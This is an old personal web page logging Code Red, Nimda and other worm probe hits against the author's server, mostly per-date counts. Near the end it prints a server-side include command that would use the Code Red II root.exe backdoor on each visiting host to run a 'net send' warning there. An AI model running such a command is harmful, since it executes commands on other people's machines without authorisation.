Code Red Attacks ?!

Hm it is time to protect your webserver with either the patch or install a real OS and WEB server
Please think of the others !


Local system dateThursday, 29-Jul-2010 21:18:08 CEST
Browser you are usingCCBot/1.0 (+http://www.commoncrawl.org/bot.html)
IP number you use38.107.191.94
Origin(none)
Hits before you


Last few code red users :





Last few nimda infected users :





Opening the log file at Tuesday 10 October 2006 23:30:01

CODE RED (new version)
-- date ---	count
-------------------
   summary:	0

CODE RED (old version)
-- date ---	count
-------------------
   summary:	0

NIMDA Virus attack !
-- date ---	count
-------------------
   summary:	0

SUMTHIN SSL probe !
-- date ---	count
13/Apr/2006	1
01/Aug/2006	1
02/Aug/2006	1
04/Aug/2006	1
06/Aug/2006	1
08/Aug/2006	1
15/Aug/2006	1
17/Aug/2006	3
26/Aug/2006	1
05/Jul/2006	1
11/Jul/2006	1
23/Jul/2006	1
26/Jul/2006	1
12/Jun/2006	1
11/May/2006	2
24/May/2006	1
01/Sep/2006	1
05/Sep/2006	1
06/Sep/2006	1
19/Sep/2006	2
27/Sep/2006	1
-------------------
   summary:	25

IE6 XP Office !
-- date ---	count
05/Apr/2006	2
06/Apr/2006	1
07/Apr/2006	3
08/Apr/2006	1
09/Apr/2006	1
10/Apr/2006	1
11/Apr/2006	1
12/Apr/2006	1
13/Apr/2006	2
14/Apr/2006	1
15/Apr/2006	1
16/Apr/2006	3
17/Apr/2006	1
18/Apr/2006	1
19/Apr/2006	1
20/Apr/2006	2
21/Apr/2006	2
22/Apr/2006	6
23/Apr/2006	1
24/Apr/2006	1
25/Apr/2006	2
26/Apr/2006	1
27/Apr/2006	1
28/Apr/2006	1
29/Apr/2006	1
30/Apr/2006	1
01/Aug/2006	1
02/Aug/2006	1
03/Aug/2006	1
04/Aug/2006	1
05/Aug/2006	1
06/Aug/2006	2
07/Aug/2006	1
08/Aug/2006	2
09/Aug/2006	1
10/Aug/2006	1
11/Aug/2006	3
12/Aug/2006	1
13/Aug/2006	1
14/Aug/2006	1
15/Aug/2006	2
16/Aug/2006	7
17/Aug/2006	2
18/Aug/2006	4
19/Aug/2006	4
20/Aug/2006	4
21/Aug/2006	1
22/Aug/2006	3
23/Aug/2006	1
24/Aug/2006	1
25/Aug/2006	2
26/Aug/2006	1
27/Aug/2006	1
28/Aug/2006	1
29/Aug/2006	1
30/Aug/2006	1
31/Aug/2006	1
01/Jul/2006	1
02/Jul/2006	1
03/Jul/2006	1
04/Jul/2006	1
05/Jul/2006	4
06/Jul/2006	1
07/Jul/2006	1
08/Jul/2006	1
09/Jul/2006	2
10/Jul/2006	1
11/Jul/2006	2
12/Jul/2006	2
13/Jul/2006	1
14/Jul/2006	2
15/Jul/2006	6
16/Jul/2006	2
17/Jul/2006	2
18/Jul/2006	3
19/Jul/2006	1
20/Jul/2006	1
21/Jul/2006	1
22/Jul/2006	1
23/Jul/2006	1
24/Jul/2006	2
25/Jul/2006	1
26/Jul/2006	1
27/Jul/2006	2
28/Jul/2006	1
29/Jul/2006	1
30/Jul/2006	1
31/Jul/2006	3
01/Jun/2006	1
02/Jun/2006	1
03/Jun/2006	1
04/Jun/2006	1
05/Jun/2006	1
06/Jun/2006	1
07/Jun/2006	3
08/Jun/2006	2
09/Jun/2006	1
10/Jun/2006	1
11/Jun/2006	2
12/Jun/2006	2
13/Jun/2006	1
14/Jun/2006	3
15/Jun/2006	3
16/Jun/2006	2
17/Jun/2006	1
18/Jun/2006	1
19/Jun/2006	1
20/Jun/2006	1
21/Jun/2006	1
22/Jun/2006	2
23/Jun/2006	1
24/Jun/2006	1
25/Jun/2006	1
26/Jun/2006	1
27/Jun/2006	1
28/Jun/2006	1
29/Jun/2006	1
30/Jun/2006	1
01/May/2006	1
02/May/2006	1
03/May/2006	2
04/May/2006	2
05/May/2006	1
06/May/2006	1
07/May/2006	1
08/May/2006	1
09/May/2006	3
10/May/2006	2
11/May/2006	1
12/May/2006	1
13/May/2006	1
14/May/2006	1
15/May/2006	2
16/May/2006	1
17/May/2006	1
18/May/2006	3
19/May/2006	1
20/May/2006	1
21/May/2006	2
22/May/2006	2
23/May/2006	1
24/May/2006	1
25/May/2006	2
26/May/2006	1
27/May/2006	2
28/May/2006	2
29/May/2006	2
30/May/2006	2
31/May/2006	1
01/Oct/2006	1
02/Oct/2006	1
03/Oct/2006	4
04/Oct/2006	4
05/Oct/2006	1
06/Oct/2006	2
07/Oct/2006	1
08/Oct/2006	1
09/Oct/2006	1
10/Oct/2006	1
01/Sep/2006	4
02/Sep/2006	1
03/Sep/2006	1
04/Sep/2006	1
05/Sep/2006	3
06/Sep/2006	1
07/Sep/2006	1
08/Sep/2006	1
09/Sep/2006	1
10/Sep/2006	1
11/Sep/2006	3
12/Sep/2006	1
13/Sep/2006	1
14/Sep/2006	3
15/Sep/2006	1
16/Sep/2006	2
17/Sep/2006	2
18/Sep/2006	2
19/Sep/2006	1
20/Sep/2006	6
21/Sep/2006	1
22/Sep/2006	1
23/Sep/2006	1
24/Sep/2006	1
25/Sep/2006	2
26/Sep/2006	1
27/Sep/2006	1
28/Sep/2006	2
29/Sep/2006	1
30/Sep/2006	1
-------------------
   summary:	299

Ready at 23:32:21 so computing took 2 Minutes and 20 seconds

Now we could execute : 
<--#exec cmd="/usr/bin/lynx -dump http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location\).%22"-->

On the above mentioned servers....oeps.....

Old list from upto 28 Sept 2001
Old list from upto 01 June 2002
Old list from upto 01 july 2003